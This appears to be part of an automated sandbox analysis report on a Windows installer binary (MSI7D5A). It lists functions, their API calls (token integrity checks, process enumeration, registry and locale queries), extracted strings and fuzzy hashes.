                                                      Uniqueness Score: -1.00%

                                                      Function 00A46A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 103 a46a50-a46a82 104 a46a84-a46aa2 call a62937 103->104 105 a46aa3-a46add GetCurrentProcess OpenProcessToken 103->105 109 a46adf-a46af2 105->109 110 a46b09-a46b1e call a45de0 105->110 111 a46af4-a46afb CloseHandle 109->111 112 a46b02-a46b04 109->112 117 a46b20-a46b2c call a41770 110->117 118 a46b2e-a46b30 110->118 111->112 114 a46c24-a46c2b call a457c0 112->114 124 a46c31-a46c35 114->124 125 a46ddb-a46e06 call a42310 114->125 117->109 121 a46b32-a46b3d call a41770 118->121 122 a46b3f-a46ba5 call a45f40 call a424c0 118->122 121->109 139 a46ba7-a46ba9 122->139 140 a46bdb 122->140 124->125 130 a46c3b-a46c3d 124->130 135 a46f96-a46fa0 call a411d0 125->135 136 a46e0c-a46e2b call a446f0 125->136 130->125 134 a46c43-a46c59 call a42310 130->134 134->135 147 a46c5f-a46c7e call a446f0 134->147 156 a46e2d-a46e2f 136->156 157 a46e59-a46e6a call a42310 136->157 144 a46baf-a46bb8 139->144 145 a46c88-a46c8a 139->145 146 a46bdd-a46c14 call a42e60 * 2 call a41770 140->146 144->140 150 a46bba-a46bbc 144->150 145->146 146->114 180 a46c16-a46c1d FindCloseChangeNotification 146->180 169 a46c80-a46c82 147->169 170 a46cad-a46cc9 call a42310 147->170 153 a46bbf 150->153 153->140 158 a46bc1-a46bc4 153->158 164 a46e35-a46e3a 156->164 165 a46e31-a46e33 156->165 157->135 173 a46e70-a46e8c call a446f0 157->173 158->145 166 a46bca-a46bd9 158->166 172 a46e40-a46e49 164->172 171 a46e4f-a46e54 call a44ac0 165->171 166->140 166->153 175 a46c84-a46c86 169->175 176 a46c8f-a46c91 169->176 170->135 187 a46ccf-a46ceb call a446f0 170->187 171->157 172->172 178 a46e4b-a46e4d 172->178 191 a46e8e-a46e90 173->191 192 a46eb9-a46ec6 call a42310 173->192 181 a46ca3-a46ca8 call a44ac0 175->181 182 a46c94-a46c9d 176->182 178->171 180->114 181->170 182->182 185 a46c9f-a46ca1 182->185 185->181 199 a46ced-a46cef 187->199 200 a46d19-a46d26 call a42310 187->200 195 a46e96-a46e9b 191->195 196 a46e92-a46e94 191->196 192->135 203 a46ecc-a46ee8 call a446f0 192->203 202 a46ea0-a46ea9 195->202 201 a46eaf-a46eb4 call a44ac0 196->201 204 a46cf5-a46cfa 199->204 205 a46cf1-a46cf3 199->205 200->135 215 a46d2c-a46d48 call a446f0 200->215 201->192 202->202 207 a46eab-a46ead 202->207 219 a46f10-a46f28 call a452f0 203->219 220 a46eea-a46eec 203->220 210 a46d00-a46d09 204->210 209 a46d0f-a46d14 call a44ac0 205->209 207->201 209->200 210->210 213 a46d0b-a46d0d 210->213 213->209 226 a46d70-a46da4 call a44ba0 215->226 227 a46d4a-a46d4c 215->227 230 a46f2d-a46f47 219->230 222 a46ef2-a46ef4 220->222 223 a46eee-a46ef0 220->223 229 a46ef7-a46f00 222->229 228 a46f06-a46f0b call a44ac0 223->228 246 a46da6-a46da9 226->246 247 a46dae-a46dc2 226->247 233 a46d52-a46d54 227->233 234 a46d4e-a46d50 227->234 228->219 229->229 236 a46f02-a46f04 229->236 231 a46f51-a46f65 230->231 232 a46f49-a46f4c 230->232 239 a46f67-a46f6a 231->239 240 a46f6f-a46f76 231->240 232->231 241 a46d57-a46d60 233->241 238 a46d66-a46d6b call a44ac0 234->238 236->228 238->226 239->240 245 a46f79-a46f84 240->245 241->241 243 a46d62-a46d64 241->243 243->238 248 a46f86-a46f89 245->248 249 a46f8e 245->249 246->247 250 a46dc4-a46dc7 247->250 251 a46dcc-a46dd6 247->251 248->249 249->135 250->251 251->245
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 00A46AC8
                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00A46AD5
                                                      • CloseHandle.KERNEL32(00000000), ref: 00A46AF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCurrentHandleOpenToken
                                                      • String ID: S-1-5-18
                                                      • API String ID: 4052875653-4289277601
                                                      • Opcode ID: 5ce4fa38e2810fbd1d07c92f05d01d18caee44ae34e5169ebef378e5d752ff10
                                                      • Instruction ID: a8f1b53048a44f6f24bd64627de72238c8746c113429827e6defc1c6c2853df4
                                                      • Opcode Fuzzy Hash: 5ce4fa38e2810fbd1d07c92f05d01d18caee44ae34e5169ebef378e5d752ff10
                                                      • Instruction Fuzzy Hash: D102E438D00619CFDF14DFA4C9557EEBBB5EF86314F148658E842AB281EB70AE05CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A457C0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 252 a457c0-a457df GetCurrentProcess OpenProcessToken 253 a457e7-a45814 GetTokenInformation 252->253 254 a457e1-a457e6 252->254 255 a45816-a4581b 253->255 256 a4581e-a4582e CloseHandle 253->256 255->256
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000008,?,838A949E,?,-00000010), ref: 00A457D0
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00A457D7
                                                      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00A4580C
                                                      • CloseHandle.KERNEL32(?), ref: 00A45822
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                      • String ID:
                                                      • API String ID: 215268677-0
                                                      • Opcode ID: 08440a8bf8745e46b411c25f0c7dd7c57ea848c08281c0989a871a75a79893de
                                                      • Instruction ID: b486b37f5824997e25ecbe48a58bef5885103c8acc3a081ce6529bdbedefa0a2
                                                      • Opcode Fuzzy Hash: 08440a8bf8745e46b411c25f0c7dd7c57ea848c08281c0989a871a75a79893de
                                                      • Instruction Fuzzy Hash: D7F0F974548301ABEB10DF60EC49BAA7BE8BB84700F608829F995D21A0D779D51DDB63
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4CDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCommandLineW.KERNEL32(838A949E,?,?,?,?,?,?,?,?,?,00A856D5,000000FF), ref: 00A4CDE8
                                                        • Part of subcall function 00A41F80: LocalAlloc.KERNELBASE(00000040,00000000,?,?,vector too long,00A44251,838A949E,00000000,?,00000000,?,?,?,00A84400,000000FF,?), ref: 00A41F9D
                                                      • ExitProcess.KERNEL32 ref: 00A4CEB1
                                                        • Part of subcall function 00A46600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00A4667E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                      • String ID: Full command line:
                                                      • API String ID: 1878577176-831861440
                                                      • Opcode ID: bf0731009c51425501db90366b6e99ade68f1654792c54d71786853d37412d32
                                                      • Instruction ID: 80df2e9a540059924a9b8134f4e270dacaad6938a2562f3ff8ed149958268a36
                                                      • Opcode Fuzzy Hash: bf0731009c51425501db90366b6e99ade68f1654792c54d71786853d37412d32
                                                      • Instruction Fuzzy Hash: A0214438A10114ABCB04FBB0CE02BEE73B1AF81750F144128F406AB282EF745F09C792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A45E40 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 289 a45e40-a45ebc GetTokenInformation 290 a45f20-a45f33 289->290 291 a45ebe-a45ec7 GetLastError 289->291 291->290 292 a45ec9-a45ed7 291->292 293 a45ede 292->293 294 a45ed9-a45edc 292->294 296 a45ee0-a45ee7 293->296 297 a45f0e-a45f1a GetTokenInformation 293->297 295 a45f0b 294->295 295->297 298 a45ef7-a45f08 call a64080 296->298 299 a45ee9-a45ef5 call a460d0 296->299 297->290 298->295 299->297
                                                      APIs
                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00A45E18,838A949E,?), ref: 00A45EB4
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00A45E18,838A949E,?), ref: 00A45EBE
                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00A45E18,838A949E,?), ref: 00A45F1A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: InformationToken$ErrorLast
                                                      • String ID:
                                                      • API String ID: 2567405617-0
                                                      • Opcode ID: 9840868ceeae4dce69fd208e0c0e5036c4aacb435b65ce280fbcc48999814e49
                                                      • Instruction ID: 98bf346e195de70f498104ccaa6930bc11201ecad76538cf2cfecc2645a198a0
                                                      • Opcode Fuzzy Hash: 9840868ceeae4dce69fd208e0c0e5036c4aacb435b65ce280fbcc48999814e49
                                                      • Instruction Fuzzy Hash: BD318F71A00605EFDB10CFA9CD45BAFBBF9FB84B10F20452EF415A7280D7B5A9048BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A770BB Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 304 a770bb-a770c6 305 a770d4-a770da 304->305 306 a770c8-a770d2 304->306 308 a770f3-a77104 RtlAllocateHeap 305->308 309 a770dc-a770dd 305->309 306->305 307 a77108-a77113 call a67370 306->307 313 a77115-a77117 307->313 311 a77106 308->311 312 a770df-a770e6 call a75245 308->312 309->308 311->313 312->307 317 a770e8-a770f1 call a7bf83 312->317 317->307 317->308
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,?,?,?,00A7596A,00000001,00000364,?,00000006,000000FF,?,00A66CE7,00000000,00A73841,00000000), ref: 00A770FC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 088e7a7c2eb70129b711a82543d0f50642a57262693666dde6c7579d121002ea
                                                      • Instruction ID: 78dab4a9278afda405d96d22dd3e3099a302cce219eb0ca3d90cfa81b77b7724
                                                      • Opcode Fuzzy Hash: 088e7a7c2eb70129b711a82543d0f50642a57262693666dde6c7579d121002ea
                                                      • Instruction Fuzzy Hash: 7BF0BE3264C2206A9B22DB669D01B6E7769AB517B0B14C221FD1C9A1A0CA20EC0287E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A45940 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 320 a45940-a4596f 321 a45971-a4597f 320->321 322 a4598f-a459a0 320->322 323 a45981-a45982 FindCloseChangeNotification 321->323 324 a45988 321->324 323->324 324->322
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?,838A949E,00000000,?,?,?), ref: 00A45982
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 2157186ea7c431da62ebf6b070ab0e2b3310c041b4a60df78dd0aaeadb60aef0
                                                      • Instruction ID: 4eb14b6b74734a71d6d6a765fa5b0e4c75fbdd2ecd968d27db249468f8b408e0
                                                      • Opcode Fuzzy Hash: 2157186ea7c431da62ebf6b070ab0e2b3310c041b4a60df78dd0aaeadb60aef0
                                                      • Instruction Fuzzy Hash: 0BF0CD75A04A48EFC710DFA9D940B5AFBF8EB05730F1042AAF810D7690E73698008BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A41F80 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 325 a41f80-a41faf LocalAlloc
                                                      APIs
                                                      • LocalAlloc.KERNELBASE(00000040,00000000,?,?,vector too long,00A44251,838A949E,00000000,?,00000000,?,?,?,00A84400,000000FF,?), ref: 00A41F9D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AllocLocal
                                                      • String ID:
                                                      • API String ID: 3494564517-0
                                                      • Opcode ID: 7f4feff6f4d7fe17018e1cc3b7c726d37079638aeb3a751a461d36fe8aaee0de
                                                      • Instruction ID: 0f78f8dda7b5fc6095198ec3b2abd7be6c1bb5bbf8533223d6719f3a1f76c8b0
                                                      • Opcode Fuzzy Hash: 7f4feff6f4d7fe17018e1cc3b7c726d37079638aeb3a751a461d36fe8aaee0de
                                                      • Instruction Fuzzy Hash: 57D02BB23012125FD3044B2CD80BB1BE698AF84710F00C53FB505C72D4CA70CC014760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00A44BA0 Relevance: 33.5, APIs: 22, Instructions: 502comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A457C0: GetCurrentProcess.KERNEL32(00000008,?,838A949E,?,-00000010), ref: 00A457D0
                                                        • Part of subcall function 00A457C0: OpenProcessToken.ADVAPI32(00000000), ref: 00A457D7
                                                      • CoInitialize.OLE32(00000000), ref: 00A44C15
                                                      • CoCreateInstance.OLE32(00A872B0,00000000,00000004,00A95104,00000000,?), ref: 00A44C45
                                                      • CoUninitialize.OLE32 ref: 00A45187
                                                      • _com_issue_error.COMSUPP ref: 00A451B5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                      • String ID:
                                                      • API String ID: 928366108-0
                                                      • Opcode ID: ce93a4e2dbb6c64dad97a4000d998de71df96f9a914da2d90529e7a7e5507be8
                                                      • Instruction ID: a5eed8b1bda8a6bfcd2a1a6d025f3292e2ae99a0b2a28fe16ce53cc4393f558b
                                                      • Opcode Fuzzy Hash: ce93a4e2dbb6c64dad97a4000d998de71df96f9a914da2d90529e7a7e5507be8
                                                      • Instruction Fuzzy Hash: AB22AE74E04388DFEF11DFB8C948BADBBB4AF89304F248199E405EB281D7759A45CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4C870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00A4CBB6
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00A9E6D0,00000800), ref: 00A4CBD3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: OpenQueryValue
                                                      • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                      • API String ID: 4153817207-482544602
                                                      • Opcode ID: 4bfa984d67e764dca8693753509d6d83e1d1cd3ec5ab68530339df5e3fd01229
                                                      • Instruction ID: 165a199933a48575e96289cf0292b08c8c151745748372ef6179cfb51674f06a
                                                      • Opcode Fuzzy Hash: 4bfa984d67e764dca8693753509d6d83e1d1cd3ec5ab68530339df5e3fd01229
                                                      • Instruction Fuzzy Hash: 01C1F63DA06216DBCFB59F24C84127A73E1EFD0760F59446AE84D9B292EB70CD82C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7DE24 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00A742D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A7DEE5
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A742D9,?,?,?,00000055,?,-00000050,?,?), ref: 00A7DF10
                                                      • _wcschr.LIBVCRUNTIME ref: 00A7DFA4
                                                      • _wcschr.LIBVCRUNTIME ref: 00A7DFB2
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00A7E073
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                      • String ID: utf8
                                                      • API String ID: 4147378913-905460609
                                                      • Opcode ID: afa2299a41449b14985e1d7634ebb671913c7fbdcd6bca59df81b2fd11351d23
                                                      • Instruction ID: 89fdc49c327252650a5b4f922156f8bca9cb36ea2eafe8a5f96f1fb34362d2b7
                                                      • Opcode Fuzzy Hash: afa2299a41449b14985e1d7634ebb671913c7fbdcd6bca59df81b2fd11351d23
                                                      • Instruction Fuzzy Hash: 5A71F332640206AADB25EB74CD46BAB73B8EF58700F14C46AF50EDB181FBB0ED418761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A43860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A438CB
                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4390B
                                                      • Process32FirstW.KERNEL32(?,00000000), ref: 00A4395F
                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00A4397A
                                                      • CloseHandle.KERNEL32(00000000), ref: 00A43A8E
                                                      • Process32NextW.KERNEL32(?,00000000), ref: 00A43AA2
                                                      • CloseHandle.KERNEL32(?), ref: 00A43AF0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 708755948-0
                                                      • Opcode ID: bf1f41e1758c48f82260e134ef7842998d5a21eeaa7ac96ce8aced9272c9158e
                                                      • Instruction ID: 4b9a84275275d7500ceebd17782fc0475717c4b18ad622f7a176123bc672c59a
                                                      • Opcode Fuzzy Hash: bf1f41e1758c48f82260e134ef7842998d5a21eeaa7ac96ce8aced9272c9158e
                                                      • Instruction Fuzzy Hash: 2AA1FAB5901249DFDF10CFA4D988BDEBBF8FF48304F248159E805AB281D7759A45CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7F032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: 9ef5a680f68d2ab134ef2b4d301af28bc3d3c1b2514903795fae1bd219590555
                                                      • Instruction ID: 37253c994f9b159e4b0b130caf912a039173c8043ef323bddcef48838e336255
                                                      • Opcode Fuzzy Hash: 9ef5a680f68d2ab134ef2b4d301af28bc3d3c1b2514903795fae1bd219590555
                                                      • Instruction Fuzzy Hash: F2D20772E082298FDB65DF28DD40BEAB7B5EB44305F1481EAD84DE7240E774AE858F41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7E5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00A7E8D1,00000002,00000000,?,?,?,00A7E8D1,?,00000000), ref: 00A7E64C
                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00A7E8D1,00000002,00000000,?,?,?,00A7E8D1,?,00000000), ref: 00A7E675
                                                      • GetACP.KERNEL32(?,?,00A7E8D1,?,00000000), ref: 00A7E68A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: ea206febe7643b15d5fd9e62af2276312b7d8137675f1b06f4cef50830795162
